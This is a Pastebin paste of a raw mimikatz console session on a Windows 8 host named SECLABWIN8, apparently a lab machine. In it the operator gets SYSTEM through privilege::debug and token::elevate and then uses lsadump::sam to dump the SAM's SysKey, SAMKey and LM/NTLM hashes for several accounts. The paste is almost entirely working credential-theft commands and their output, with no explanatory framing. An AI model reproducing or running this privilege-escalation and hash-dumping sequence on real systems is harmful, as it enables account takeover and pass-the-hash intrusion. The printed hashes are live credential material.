Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Using 'hash.txt' for logfile : OK
- mimikatz # lsadump::sam
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
- ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
- mimikatz # lsadump::sam
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
- ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
- mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
- ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
- mimikatz # token::elevate
- Token Id : 0
- User name :
- SID name : NT AUTHORITY\SYSTEM
- 464 {0;000003e7} 0 D 41960 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Primary
- -> Impersonated !
- * Process Token : {0;0012310c} 2 D 34369037 SecLabWin8\Administrator S-1-5-21-3030430307-1650540796-4004713979-500 (14g,23p) Primary
- * Thread Token : {0;000003e7} 0 D 34417986 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Impersonation (Delegation)
- mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- Local SID : S-1-5-21-3030430307-1650540796-4004713979
- SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
- RID : 000001f4 (500)
- User : Administrator
- Hash LM : a14dc20682ebc0a35db15e7df7536625
- Hash NTLM: 4fd9671fef737b514356e75063f7dcac
- lm - 0: a14dc20682ebc0a35db15e7df7536625
- ntlm- 0: 4fd9671fef737b514356e75063f7dcac
- ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
- RID : 000001f5 (501)
- User : Guest
- RID : 000003e9 (1001)
- User : win8
- Hash NTLM: 00277317be7631466e6480877eedba5c
- RID : 000003ea (1002)
- User : poweruser
- Hash NTLM: 4fd9671fef737b514356e75063f7dcac
- RID : 000003eb (1003)
- User : snmp
- Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
- mimikatz # reg save HKLM\SAM SamBkup.hiv
- ERROR mimikatz_doLocal ; "reg" command of "standard" module not found !
- Module : standard
- Full name : Standard module
- Description : Basic commands (does not require module name)
- exit - Quit mimikatz
- cls - Clear screen (doesn't work with redirections, like PsExec)
- answer - Answer to the Ultimate Question of Life, the Universe, and Everything
- coffee - Please, make me a coffee!
- sleep - Sleep an amount of milliseconds
- log - Log mimikatz input/output to file
- base64 - Switch file input/output base64
- version - Display some version informations
- cd - Change or display current directory
- localtime - Displays system local date and time (OJ command)
- hostname - Displays system local hostname
- mimikatz # privilege::debug
- Privilege '20' OK
- mimikatz # token::elevate
- Token Id : 0
- User name :
- SID name : NT AUTHORITY\SYSTEM
- 464 {0;000003e7} 0 D 41960 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Primary
- -> Impersonated !
- * Process Token : {0;0012310c} 2 D 34369037 SecLabWin8\Administrator S-1-5-21-3030430307-1650540796-4004713979-500 (14g,23p) Primary
- * Thread Token : {0;000003e7} 0 D 34449475 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Impersonation (Delegation)
- mimikatz # log hash.txt
- Using 'hash.txt' for logfile : OK
- mimikatz # lsadump::sam
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- Local SID : S-1-5-21-3030430307-1650540796-4004713979
- SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
- RID : 000001f4 (500)
- User : Administrator
- Hash LM : a14dc20682ebc0a35db15e7df7536625
- Hash NTLM: 4fd9671fef737b514356e75063f7dcac
- lm - 0: a14dc20682ebc0a35db15e7df7536625
- ntlm- 0: 4fd9671fef737b514356e75063f7dcac
- ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
- RID : 000001f5 (501)
- User : Guest
- RID : 000003e9 (1001)
- User : win8
- Hash NTLM: 00277317be7631466e6480877eedba5c
- RID : 000003ea (1002)
- User : poweruser
- Hash NTLM: 4fd9671fef737b514356e75063f7dcac
- RID : 000003eb (1003)
- User : snmp
- Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
- mimikatz #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement